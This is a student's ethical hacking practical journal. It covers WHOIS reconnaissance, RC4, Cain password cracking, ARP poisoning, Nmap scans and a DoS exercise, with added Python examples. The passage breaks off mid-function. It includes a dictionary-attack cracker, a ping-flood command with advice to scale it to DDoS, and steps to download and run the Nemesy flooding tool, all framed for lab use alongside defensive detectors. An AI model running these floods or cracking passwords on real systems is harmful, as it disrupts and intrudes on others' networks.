Semester VI Subject Name: Ethical Hacking Name: Mohammed Raza Haqiqullah Khan Class: T.Y. B.Sc. Computer Science


B.K. BIRLA COLLEGE OF ARTS, SCIENCE & COMMERCE, KALYAN
(Department of Computer Science)

Semester VI

Subject Name: Ethical Hacking

Name: Mohammed Raza Haqiqullah Khan

Class: T.Y. B.Sc. Computer Science

Roll No.: 336

Exam Seat No.:


B.K. BIRLA COLLEGE OF
ARTS, SCIENCE & COMMERCE, KALYAN
(Department of Computer Science)

CERTIFICATE

This is to certify that Mr./Miss Mohammed Raza Haqiqullah Khan, Roll No. 336, Exam Seat No. ______, has satisfactorily completed the practicals in Ethical Hacking as laid down in the regulations of the University of Mumbai for the purpose of the Semester VI Examination 2021-2022.

Date:
Place:

Head, Department of Computer Science          Professor In-Charge, Computer Science

Signature of Examiners
INDEX

Sr. No   Particulars                                                              Date
1.       Use Google and Whois for Reconnaissance                                  March 05, 2022
2.       a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm    March 05, 2022
         b) Use Cain and Abel for cracking Windows account password using
            Dictionary attack and to decode wireless network passwords
3.       a) Run and analyze the output of following commands in Linux:           March 05, 2022
            ifconfig, ping, netstat, traceroute
         b) Perform ARP Poisoning in Windows
4.       Use NMap scanner to perform port scanning of various forms:             March 07, 2022
         ACK, SYN, FIN, NULL, XMAS
5.       a) Use Wireshark (Sniffer) to capture network traffic and analyze      March 07, 2022
         b) Use Nemesy to launch DoS attack
6.       Simulate persistent cross-site scripting attack                         March 09, 2022
7.       Session impersonation using Firefox and Tamper Data add-on              March 09, 2022
8.       Perform SQL injection attack                                            March 05, 2022
9.       Create a simple keylogger using python                                  March 11, 2022
10.      Using Metasploit to exploit (Kali Linux)                                March 11, 2022
Practical No.: 01 Roll No.: 336
Topic: Use Google and Whois for Reconnaissance

Aim: Use Google and Whois for Reconnaissance


Background Info: WHOIS is both a query/response protocol (RFC 3912, TCP port 43) and the public record it returns for a domain: the registrar of record, creation, update and expiry dates, the name servers, the domain status locks and, where not redacted, the registrant contacts. The Internet Corporation for Assigned Names and Numbers (ICANN) accredits registrars and sets the rules for registration. Since 2018 most registrant contact details are redacted for privacy, so what a reconnaissance step usually yields is the registrar, the DNS hosting and the dates, not a person's name.

Steps:

Step 1: Open the who.is website (or run whois google.com from a Linux terminal).

Step 2: Enter the domain name and press Enter.

Output:
who.is lookup for google.com (text recovered from the screenshot; the "Similar Domains" list is omitted):

Registrar Info
  Name:           MarkMonitor Inc.
  Whois Server:   whois.markmonitor.com
  Referral URL:   http://www.markmonitor.com
  Status:         clientDeleteProhibited, clientTransferProhibited, clientUpdateProhibited,
                  serverDeleteProhibited, serverTransferProhibited, serverUpdateProhibited

Important Dates
  Expires On:     2028-09-13
  Registered On:  1997-09-15
  Updated On:     2019-09-09

Name Servers
  ns1.google.com, ns2.google.com, ns3.google.com, ns4.google.com
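The lookup above can be done without the website. The following is an added example, not part of the original practical and not code from who.is: it sends a raw WHOIS query over TCP port 43 and parses the reply into the fields recorded above (registrar, dates, statuses, name servers). The network function is optional; the SAMPLE_REPLY it parses offline is a constructed response whose domain, registrar and name servers are placeholders, not real registry data.

```python
# Added example, not part of the original practical: fetch a WHOIS record over
# TCP port 43 (RFC 3912) and extract what a recon note needs. SAMPLE_REPLY is a
# constructed response that imitates the registrar-style layout; the domain,
# registrar and name servers in it are placeholders, not real registry data.
import re
import socket
from datetime import datetime, timezone
from typing import Optional

def query_whois(domain: str, server: str = "whois.iana.org", timeout: float = 10.0) -> str:
    """Send 'domain\\r\\n' to a WHOIS server and read until it closes the connection.
    Ask the registry first (whois.iana.org names it), then the 'Registrar WHOIS
    Server' the registry reply points to for the fuller record."""
    with socket.create_connection((server, 43), timeout=timeout) as sock:
        sock.sendall(domain.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")

SAMPLE_REPLY = """\
   Domain Name: EXAMPLE-LAB.TEST
   Registrar WHOIS Server: whois.registrar.example
   Updated Date: 2019-09-09T15:39:04Z
   Creation Date: 1997-09-15T04:00:00Z
   Registry Expiry Date: 2028-09-13T04:00:00Z
   Registrar: Example Registrar, Inc.
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
   Registrant Organization: REDACTED FOR PRIVACY
   Name Server: NS1.EXAMPLE-LAB.TEST
   Name Server: NS2.EXAMPLE-LAB.TEST
>>> Last update of whois database: 2022-03-05T10:00:00Z <<<
"""

SCALAR_KEYS = {"registrar", "registrar whois server", "creation date",
               "updated date", "registry expiry date", "registrant organization"}

def parse_whois(text: str) -> dict:
    """Turn 'Key: value' lines into a dict; repeating keys become lists."""
    record = {"name_servers": [], "statuses": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("%", "#", ">>>")):
            continue                                   # comments and the trailer line
        m = re.match(r"^([A-Za-z][A-Za-z /]*?):\s*(.+)$", line)
        if not m:
            continue
        key, value = m.group(1).strip().lower(), m.group(2).strip()
        if key == "name server":
            record["name_servers"].append(value.lower())
        elif key == "domain status":
            record["statuses"].append(value.split()[0])   # drop the EPP URL
        elif key in SCALAR_KEYS:
            record.setdefault(key, value)
    return record

def parse_whois_date(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def days_to_expiry(record: dict, now_iso: str) -> Optional[int]:
    """Days until the registration lapses; a lapsed domain can be re-registered by
    anyone, which is why the date matters in recon. None if the field is absent."""
    expiry = record.get("registry expiry date")
    if expiry is None:
        return None
    return (parse_whois_date(expiry) - parse_whois_date(now_iso)).days

def is_transfer_locked(record: dict) -> bool:
    """client/serverTransferProhibited mean transfers are blocked at the registrar
    or registry, so a hijack would need the registrar account, not just a request."""
    return any(s.endswith("TransferProhibited") for s in record["statuses"])

if __name__ == "__main__":
    rec = parse_whois(SAMPLE_REPLY)      # offline; swap in query_whois("example.com")
    print(rec)
    print("days to expiry:", days_to_expiry(rec, "2022-03-05T00:00:00Z"))
    print("transfer locked:", is_transfer_locked(rec))
```

The status lines are the part worth reading on a real target: all six Prohibited locks on google.com mean the record cannot be deleted, transferred or changed by a registrar request alone, which is the registry-level defence against domain hijacking.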
Practical No.: 02 Roll No.: 336

Topic: a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm

b) Use Cain and Abel for cracking Windows account password using Dictionary attack and to
decode wireless network passwords

2. a)
Aim: a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
Background Info: CrypTool is a free, open-source e-learning program for experimenting with cryptographic and cryptanalytic methods. It lets you run classical and modern ciphers, hash functions and analysis tools on a text and inspect each step, which is why it is used here instead of a production cryptography library.

Steps:

Step 1: Open CrypTool >> File >> New, and type some text, e.g. "Hello World!".

Step 2: Open the Encrypt/Decrypt menu.

Step 3: Select Symmetric (Modern) >> RC4, enter a key (CrypTool takes it as hexadecimal bytes; the key length you choose is the only security parameter) and click Encrypt. A new window holds the ciphertext.

Step 4: With the ciphertext window active, repeat Encrypt/Decrypt >> Symmetric (Modern) >> RC4 with the same key and click Decrypt. The original text returns, because RC4 encryption and decryption are the same operation: an XOR of the data with the keystream derived from the key.

Output:

- Encrypted text (RC4)
- Decrypted text using RC4

Caveat: RC4 is deprecated (RFC 7465 prohibits it in TLS) because its keystream has statistical biases, and using one key for two messages leaks their XOR.
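What CrypTool does in the RC4 dialog, as an added example that is not part of the original practical and not CrypTool's code: RC4 written out from its definition (key scheduling, then keystream generation), the encrypt/decrypt round trip from Step 4, and the keystream-reuse failure mentioned in the caveat. The keys and messages are constructed test inputs.

```python
# Added example, not from the original practical or from CrypTool: RC4 written
# out from its definition so the lab's encrypt/decrypt round trip can be checked
# without the GUI, plus the keystream-reuse failure that makes reusing an RC4
# key unsafe. Keys and messages below are constructed test inputs.

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Key-scheduling (KSA) then pseudo-random generation (PRGA) of `length` bytes."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA: permute S under the key
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # PRGA: one keystream byte per step
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: both are the same XOR with the keystream."""
    return bytes(d ^ k for d, k in zip(data, rc4_keystream(key, len(data))))

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def keystream_reuse_leak(key: bytes, m1: bytes, m2: bytes) -> bytes:
    """Two messages under one RC4 key: c1 XOR c2 == m1 XOR m2, the keystream cancels.
    An attacker who knows (or guesses) m1 then reads m2 without the key."""
    return xor_bytes(rc4(key, m1), rc4(key, m2))

if __name__ == "__main__":
    key = b"Key"
    ct = rc4(key, b"Hello World!")             # what the CrypTool RC4 dialog produces
    print("ciphertext:", ct.hex())
    print("decrypted :", rc4(key, ct))
    leak = keystream_reuse_leak(key, b"Hello World!", b"Attack at 9!")
    print("m2 recovered from c1^c2 and known m1:", xor_bytes(leak, b"Hello World!"))
```

The first two test vectors (key "Key"/"Plaintext", key "Wiki"/"pedia") are the published RC4 reference values, so the implementation can be checked against CrypTool's output byte for byte.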

2. b)

Aim b) Use Cain and Abel for cracking Windows account password using Dictionary attack and
to decode wireless network passwords

Background Info: Cain and Abel (often abbreviated to Cain) was a password recovery tool for Microsoft
Windows. It could recover many kinds of passwords using methods such as network packet sniffing,
cracking various password hashes by using methods such as dictionary attacks, brute force and
cryptanalysis attacks.

Steps:

Step 1: Open Cain, then Tools >> Hash Calculator.

Step 2: Type the password to hash and copy the MD5 value. (For a real Windows account you would instead dump the LM/NTLM hashes from the Cracker tab; the MD5 here stands in for a captured hash.)

Step 3: In the Cracker tab, select the MD5 Hashes list, right-click >> Add to list and paste the hash.

Step 4: Right-click the hash >> Dictionary Attack, add a wordlist file, tick the mangling options (case variations, numbers appended, reversed) and click Start. The attack only succeeds if the password, or one of its mangled forms, is in the wordlist; because MD5 and NTLM are fast, unsalted hashes, a large wordlist is tried in seconds.

For the wireless part, use the Decoders tab >> Wireless Passwords, which reads the keys of the Wi-Fi profiles saved on the local machine (administrator rights required).
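The attack Cain runs in Step 4, as an added example that is neither part of the original practical nor Cain's code: a dictionary attack with simple mangling rules against an unsalted fast hash, plus the salted slow-KDF form that defeats it. The wordlist and target passwords are constructed; every hash is computed locally, none comes from a real system.

```python
# Added example, not from the original practical or from Cain: the dictionary
# attack Cain runs, written out. The wordlist and target passwords are
# constructed; the hashes are computed here, not taken from any real system.
import hashlib
from typing import Iterable, Optional, Tuple

WORDLIST = ["123456", "qwerty", "letmein", "password", "Password1"]   # constructed

def hash_hex(algorithm: str, candidate: str) -> str:
    """Unsalted fast hash of a candidate, as stored by weak schemes (MD5, SHA-1, ...)."""
    return hashlib.new(algorithm, candidate.encode("utf-8")).hexdigest()

def mangle(word: str) -> Iterable[str]:
    """Cain-style mangling rules: case variants, reversal, a digit appended."""
    base = [word, word.lower(), word.upper(), word.capitalize(), word[::-1]]
    seen = set()
    for v in base + [v + d for v in base for d in "0123456789"]:
        if v not in seen:
            seen.add(v)
            yield v

def dictionary_attack(target_hex: str, algorithm: str, wordlist: Iterable[str],
                      rules: bool = True) -> Tuple[Optional[str], int]:
    """Return (recovered password or None, number of hashes tried)."""
    target = target_hex.lower()
    tried = 0
    for word in wordlist:
        for cand in (mangle(word) if rules else [word]):
            tried += 1
            if hash_hex(algorithm, cand) == target:
                return cand, tried
    return None, tried

def slow_salted_hash(password: str, salt: bytes, iterations: int = 200_000) -> str:
    """What a sane store does instead: per-user salt plus a slow KDF. The same
    attack now needs the salt and pays `iterations` hash operations per guess."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations).hex()

if __name__ == "__main__":
    target = hash_hex("md5", "Qwerty7")        # stands in for a hash pasted into Cain
    print(dictionary_attack(target, "md5", WORDLIST))
    print(dictionary_attack(hash_hex("md5", "correct horse battery staple"), "md5", WORDLIST))
```

Windows itself stores NT hashes (MD4 over the UTF-16LE password), which Cain cracks the same way; the principle is identical, only the hash function changes.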
Practical No.: 03 Roll No.: 336
Topic: a) Run and analyze the output of following commands in Linux – ifconfig, ping, netstat,
traceroute

b) Perform ARP Poisoning in Windows

3. a)
Aim: a) Run and analyze the output of following commands in Linux – ifconfig, ping, netstat, traceroute
Steps:

Step 1: Run ifconfig (Linux) or ipconfig (Windows).

ifconfig/ipconfig display the IP address, netmask, gateway and MAC address currently assigned to each interface; this is how you verify connectivity and your own network settings before scanning anything else. On current Linux distributions ifconfig is deprecated in favour of ip addr. Windows syntax:

ipconfig [/allcompartments] [/? | /all | /renew [adapter] | /release [adapter] | /renew6 [adapter] | /release6 [adapter] | /flushdns | /displaydns | /registerdns | /showclassid adapter | /setclassid adapter [classid] | /showclassid6 adapter | /setclassid6 adapter [classid]]

Step 2: Ping the addresses found.

ping sends ICMP Echo Request packets to a host and reports whether Echo Replies come back and how long they take. It tests reachability of a host, not whether any service is up, and a host or firewall that drops ICMP appears unreachable even when it is online. Windows syntax (Linux ping uses -c count and -s size instead of -n and -l, and runs until stopped by default):

ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [-w timeout] [-R] [-S srcaddr] [-p] [-4] [-6] target [/?]

Step 3: Run netstat.

netstat (network statistics) lists the local machine's active connections and listening sockets, per-protocol counters and the routing table, which is what you need to see which services a machine exposes and what it is talking to. For a security review the useful options are -a (all sockets), -n (numeric, no DNS lookups) and -o (owning PID; -p on Linux). Windows syntax:

netstat [-a] [-b] [-e] [-f] [-n] [-o] [-p protocol] [-r] [-s] [-t] [-x] [-y] [time_interval] [/?]

Step 4: Run tracert www.google.com (Windows) or traceroute www.google.com (Linux) and press Enter.

Both show the path packets take from your host to the destination, listing every router hop and its round-trip time until the destination answers or the hop limit is reached; a hop that prints * drops or does not answer the probe. tracert sends ICMP Echo probes with increasing TTL; Linux traceroute sends UDP probes by default (-I for ICMP, -T for TCP), so the two can show different paths through firewalls that filter one protocol. Windows syntax:

tracert [-d] [-h MaxHops] [-w TimeOut] [-4] [-6] target [/?]
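Reading netstat output by eye is error-prone on a busy host, so here is an added example, not part of the original practical, that parses netstat -ano output (Windows layout; netstat -tunap on Linux differs only in the columns) and picks out the two things a security review looks for: sockets listening on every interface, and established connections to ports you would not expect. The SAMPLE text is constructed output with placeholder addresses.

```python
# Added example, not from the original practical: parse `netstat -ano` output
# (Windows layout) and pick out what matters for a security review: sockets
# listening on all interfaces and established connections to unusual ports.
# SAMPLE is constructed output; the addresses and PIDs are placeholders.
from typing import Dict, List, Optional, Tuple

SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:5432         0.0.0.0:0              LISTENING       2240
  TCP    192.168.1.10:49712     142.250.183.46:443     ESTABLISHED     5120
  TCP    192.168.1.10:49800     203.0.113.7:4444       ESTABLISHED     6620
  TCP    [::]:3389              [::]:0                 LISTENING       1180
  UDP    0.0.0.0:5353           *:*                                    3316
"""

def split_endpoint(endpoint: str) -> Tuple[str, Optional[int]]:
    """'192.168.1.10:49712' -> ('192.168.1.10', 49712); '[::]:3389' -> ('::', 3389); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)

def parse_netstat(text: str) -> List[Dict]:
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue                                   # headers and blank lines
        proto, local, foreign = parts[0], parts[1], parts[2]
        state = parts[3] if proto == "TCP" else ""     # UDP lines have no state column
        lhost, lport = split_endpoint(local)
        fhost, fport = split_endpoint(foreign)
        rows.append({"proto": proto, "local": lhost, "lport": lport, "foreign": fhost,
                     "fport": fport, "state": state, "pid": int(parts[-1])})
    return rows

def exposed_listeners(rows: List[Dict]) -> List[Dict]:
    """Listeners bound to every interface (0.0.0.0 or ::) are reachable from the
    network; 127.0.0.1 / ::1 bindings are not."""
    return [r for r in rows if r["state"] == "LISTENING" and r["local"] in ("0.0.0.0", "::")]

COMMON_PORTS = {22, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3389}

def unusual_outbound(rows: List[Dict], allowed=COMMON_PORTS) -> List[Dict]:
    """Established TCP sessions to a foreign port outside the expected set; a
    workstation talking to port 4444 is the kind of entry that needs an explanation."""
    return [r for r in rows if r["state"] == "ESTABLISHED" and r["fport"] not in allowed]

if __name__ == "__main__":
    rows = parse_netstat(SAMPLE)
    for r in exposed_listeners(rows):
        print("exposed listener:", r["proto"], r["lport"], "pid", r["pid"])
    for r in unusual_outbound(rows):
        print("unusual outbound:", r["foreign"], r["fport"], "pid", r["pid"])
```

Pair the PID column with tasklist /fi "pid eq N" (ps -p N on Linux) to name the process behind each flagged row.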
3.b)
Aim: b) Perform ARP Poisoning in Windows
Background Info: ARP (Address Resolution Protocol) maps IPv4 addresses to MAC addresses on a LAN. It has no authentication: any host can send an ARP reply claiming an IP address, and every receiver caches it. ARP poisoning (ARP spoofing) abuses this by sending forged replies so that traffic meant for the gateway or another host is redirected through the attacker, which allows interception, modification or denial of service of that traffic.

Steps:

Step 1: Open CMD as administrator and run: arp -a

- arp is the ARP cache utility located in the Windows\System32 directory
- -a displays the contents of the ARP cache (Internet Address, Physical Address, dynamic/static)

Step 2: Run: ipconfig /all

- This shows your own IPv4 address and MAC address (listed as Physical Address); note the Default Gateway address as well.

Step 3: Run: arp -s ip_address mac_address

- -s adds a static entry for the given IP/MAC pair, typically the gateway. A static entry is not overwritten by incoming ARP replies, which makes it the usual host-side mitigation against poisoning. (The form arp -a ip_address mac_address in the original notes is not valid: -a only lists entries.)
- Note: this exercise only edits the local cache. Poisoning another host means sending it forged ARP replies (for example with Cain's APR feature or arpspoof), which must only be done on a lab network you own.

Step 4: Run: arp -d ip_address

- -d removes the entry (arp -d * clears the whole cache).
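From the victim's side, poisoning shows up in the arp -a output of Step 1. The following is an added example, not part of the original practical: it parses two arp -a snapshots and flags the two signatures of a poisoned cache, one MAC answering for several IP addresses and the gateway's MAC changing between snapshots. Both snapshots are constructed with placeholder lab addresses.

```python
# Added example, not from the original practical: read two `arp -a` snapshots
# (Windows layout) and flag what ARP poisoning looks like from the victim's cache:
# one MAC claiming several IP addresses, or the gateway's MAC changing. Both
# snapshots are constructed; the addresses are lab placeholders.
from collections import defaultdict
from typing import Dict, List, Tuple

BEFORE = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.251           01-00-5e-00-00-fb     static
"""

AFTER = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.251           01-00-5e-00-00-fb     static
"""

def parse_arp_table(text: str) -> Dict[str, str]:
    """IP -> MAC (normalised to lower-case with '-' separators) from arp -a output."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0][0].isdigit() and "-" in parts[1]:
            table[parts[0]] = parts[1].lower().replace(":", "-")
    return table

def is_special(ip: str, mac: str) -> bool:
    """Broadcast and multicast entries legitimately repeat MACs; skip them."""
    return mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e") or ip.endswith(".255")

def duplicate_macs(table: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """MACs that answer for more than one IP: the classic poisoning signature
    (the attacker's NIC now claims the gateway as well as its own address)."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        if not is_special(ip, mac):
            by_mac[mac].append(ip)
    return sorted((mac, ips) for mac, ips in by_mac.items() if len(ips) > 1)

def changed_entries(before: Dict[str, str], after: Dict[str, str]) -> Dict[str, Tuple[str, str]]:
    """IPs whose MAC differs between two snapshots: {ip: (old_mac, new_mac)}. A DHCP
    renewal can legitimately move a host's MAC; the gateway's should not move."""
    return {ip: (before[ip], after[ip]) for ip in before if ip in after and before[ip] != after[ip]}

if __name__ == "__main__":
    old, new = parse_arp_table(BEFORE), parse_arp_table(AFTER)
    print("duplicate MACs:", duplicate_macs(new))
    print("changed:", changed_entries(old, new))
    # host-side mitigation, the static entry Step 3 creates:
    print("arp -s 192.168.1.1", old["192.168.1.1"])
```

On a managed switch the equivalent control is Dynamic ARP Inspection, which drops ARP replies that do not match the DHCP snooping table; the static entry above protects only the one host it is set on.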
Practical No.: 04 Roll No.: 336
Topic: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS

Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS
Background Info: Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover
hosts and services on a computer network by sending packets and analyzing the responses. Nmap
provides a number of features for probing computer networks, including host discovery and service
and operating system detection.

Steps:

NOTE: Install Nmap for Windows (the installer also installs Npcap, which the raw-packet scans below need). Open cmd as administrator and type "nmap" to check that it is installed properly. Then run the commands below; the target is a hostname or IP address, and scanme.nmap.org is the host the Nmap project provides for scan practice.

nmap <target>

- ACK Scan (-sA)

It never determines open (or even open|filtered) ports. It is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered: a RST reply means the port is unfiltered, no reply means filtered.
Command: nmap -sA -T4 scanme.nmap.org

- SYN (Stealth) Scan (-sS)

SYN scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls. It sends a SYN and reads the answer (SYN/ACK = open, RST = closed, no answer = filtered) without completing the handshake. It is the default only when Nmap has raw-socket privileges; otherwise Nmap falls back to a full connect scan (-sT).
Command: nmap -sS -p22,113,139 scanme.nmap.org

- FIN Scan (-sF)

Sets just the TCP FIN bit. RFC 793 says a closed port answers with RST and an open port stays silent, so no reply is reported as open|filtered.
Command: nmap -sF -T4 scanme.nmap.org

- NULL Scan (-sN)

Does not set any bits (the TCP flag header is 0).
Command: nmap -sN -p 22 scanme.nmap.org

- XMAS Scan (-sX)

Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
Command: nmap -sX -T4 scanme.nmap.org

Caveat: FIN, NULL and XMAS scans only work against RFC-compliant TCP stacks. Windows and many Cisco devices answer RST to every such probe, so all ports show as closed regardless of their real state.
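The five scans differ only in the flags they send and in how Nmap interprets the answer. As an added example, not part of the original practical and not Nmap's code, the decision rules for each scan type are written out below, together with the TCP flag byte each probe carries; the probe answers fed to it are constructed, not real scan results.

```python
# Added example, not from the original practical or from Nmap: the decision
# rules Nmap applies to each probe's answer for the five scan types used above,
# and the TCP flag byte each probe carries. Inputs are constructed probe results.
from typing import Dict, Optional, Tuple

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

PROBE_FLAGS = {"SYN": SYN, "ACK": ACK, "FIN": FIN, "NULL": 0, "XMAS": FIN | PSH | URG}

# ICMP type 3 codes Nmap treats as "filtered": net/host/protocol unreachable and
# the administratively-prohibited family (codes 1, 2, 3, 9, 10, 13).
FILTERED_ICMP_CODES = {1, 2, 3, 9, 10, 13}

def classify(scan: str, response: str, icmp_code: Optional[int] = None) -> str:
    """Port state Nmap reports for one probe.
    response: 'SYN/ACK', 'RST', 'NONE' (timeout after retransmit) or 'ICMP-UNREACH'."""
    if response == "ICMP-UNREACH":
        return "filtered" if icmp_code in FILTERED_ICMP_CODES else "unknown"
    if scan == "SYN":
        return {"SYN/ACK": "open", "RST": "closed", "NONE": "filtered"}[response]
    if scan == "ACK":
        # any RST means the probe got through: no stateful firewall in the way,
        # but it says nothing about whether the port is open
        return {"RST": "unfiltered", "NONE": "filtered"}[response]
    if scan in ("FIN", "NULL", "XMAS"):
        # RFC 793: closed ports answer RST, open ports stay silent, so silence is
        # ambiguous between "open" and "dropped by a firewall"
        return {"RST": "closed", "NONE": "open|filtered"}[response]
    raise ValueError(f"unknown scan type {scan}")

def flags_set(flag_byte: int) -> str:
    """Human-readable flag list, as Wireshark's TCP dissector shows it."""
    names = [("FIN", FIN), ("SYN", SYN), ("RST", RST), ("PSH", PSH), ("ACK", ACK), ("URG", URG)]
    return ",".join(n for n, bit in names if flag_byte & bit) or "none"

def summarize(scan: str, results: Dict[int, Tuple[str, Optional[int]]]) -> Dict[int, str]:
    """results: {port: (response, icmp_code)} -> {port: state}."""
    return {port: classify(scan, resp, code) for port, (resp, code) in results.items()}

if __name__ == "__main__":
    probe = {22: ("SYN/ACK", None), 113: ("RST", None), 139: ("NONE", None),
             25: ("ICMP-UNREACH", 13)}                   # constructed answers
    print("SYN scan:", summarize("SYN", probe))
    print("XMAS probe flags:", flags_set(PROBE_FLAGS["XMAS"]))
    # Windows / Cisco quirk: RST to every FIN/NULL/XMAS probe, so everything shows closed
    print("XMAS vs Windows:", summarize("XMAS", {22: ("RST", None), 80: ("RST", None)}))
```

The same table explains why an ACK scan is the right first probe against an unknown firewall: it is the only one of the five whose two answers (RST vs silence) map directly onto "stateless filter" vs "stateful filter".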
Practical No.: 05 Roll No.: 336
Topic: a) Use Wireshark (Sniffer) to capture network traffic and analyze

b) Use Nemesy to launch DoS attack

Aim: a) Use Wireshark (Sniffer) to capture network traffic and analyze


Background Info: Wireshark is a free and open-source packet analyzer. It is used for network
troubleshooting, analysis, software and communications protocol development, and education.
Originally named Ethereal, the project was renamed Wireshark in May 2006 due to trademark
issues.

Steps:

Step 1: Install and open Wireshark (the Windows installer includes Npcap, which capturing needs).

Step 2: Double-click the Ethernet or Wi-Fi interface to start capturing on it.

Step 3: Open CMD and run: ping www.google.com

Step 4: Type icmp in the display filter bar. The Echo Request / Echo Reply pairs from the ping appear; click one to expand the Ethernet, IP and ICMP layers and check the ICMP identifier, sequence number and checksum.

Aim: b) Use Nemesy to launch DoS attack


Steps:

- Ping flood (often, inaccurately, called "Ping of Death")

We will assume you are using Windows for this exercise, and that you have at least two computers on the same network. DoS attacks are illegal against networks you are not authorized to test, so set up your own lab network for this exercise. The historical Ping of Death was an oversized (larger than 65535 bytes after reassembly) fragmented ICMP packet that crashed old IP stacks; modern systems reject it. What is done below is a flood of large Echo Requests, which only consumes bandwidth and CPU on the target.

- Open the command prompt on the target computer.
- Enter the command ipconfig and take note of the IPv4 address. For this example a mobile broadband connection was used; a LAN makes the exercise more effective.
- Switch to the computer you want to attack from and open the command prompt.
- We will ping the victim continuously with 65500-byte payloads. Enter the following command:

ping 10.128.131.108 -t -l 65500

HERE,
- "ping" sends the ICMP Echo Requests to the victim
- "10.128.131.108" is the IP address of the victim
- "-t" keeps sending until the program is stopped (Ctrl+C)
- "-l 65500" sets the payload size in bytes (the maximum Windows ping accepts)

Flooding the target from a single computer has little effect on the victim. To make the attack noticeable, send pings from more than one computer at once; that is the distributed form (DDoS).

The same method can be aimed at routers, web servers, etc.

To see the effect on the target computer, open Task Manager and view the network activity:

- Right-click the taskbar
- Select Start Task Manager
- Click the Network tab (on Windows 10, Performance >> Ethernet or Wi-Fi)

If the attack is working you should see increased network activity.

- Hacking Activity: Launch a DoS attack with Nemesy

In this scenario we use Nemesy to generate packets and flood the target computer, router or server. Nemesy is detected as malware by anti-virus products and will be quarantined unless you exclude it; do this only inside an isolated lab VM, never on a machine holding real data.

- Download Nemesy from http://packetstormsecurity.com/files/25599/nemesy13.zip.html
- Unzip it and run the program Nemesy.exe
- Enter the target IP address; here we use the same target IP as in the ping example.

HERE,
- 0 as the number of packets means unlimited; set a number if you do not want an endless flood
- the Size field is the payload bytes per packet, and Delay is the interval between packets in milliseconds

Click the Send button; the title bar shows the number of packets sent.
Click the Halt button to stop the program from sending packets.
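What Wireshark shows for the ping capture in part (a), and what distinguishes the flood in part (b) from it, in one added example that is not part of the original practical and not Wireshark's or Nemesy's code: a minimal dissector for the Ethernet/IPv4/ICMP frames the ping produces, with checksum verification like Wireshark's, and a per-source rate check over a constructed capture. All frames are built in the script; the MAC and IP addresses are lab placeholders.

```python
# Added example, not from the original practical, Wireshark or Nemesy: a minimal
# dissector for the Ethernet/IPv4/ICMP frames the ping exercise produces (the
# layers Wireshark shows), plus a per-source rate check that separates the lab's
# ping flood from normal pings. All frames are built here; the MAC and IP
# addresses are constructed lab placeholders.
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; over a packet with its checksum in place it is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))

def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)

def build_echo_frame(src_ip: str, dst_ip: str, ident: int, seq: int,
                     payload: bytes = b"abcdefghijklmnop") -> bytes:
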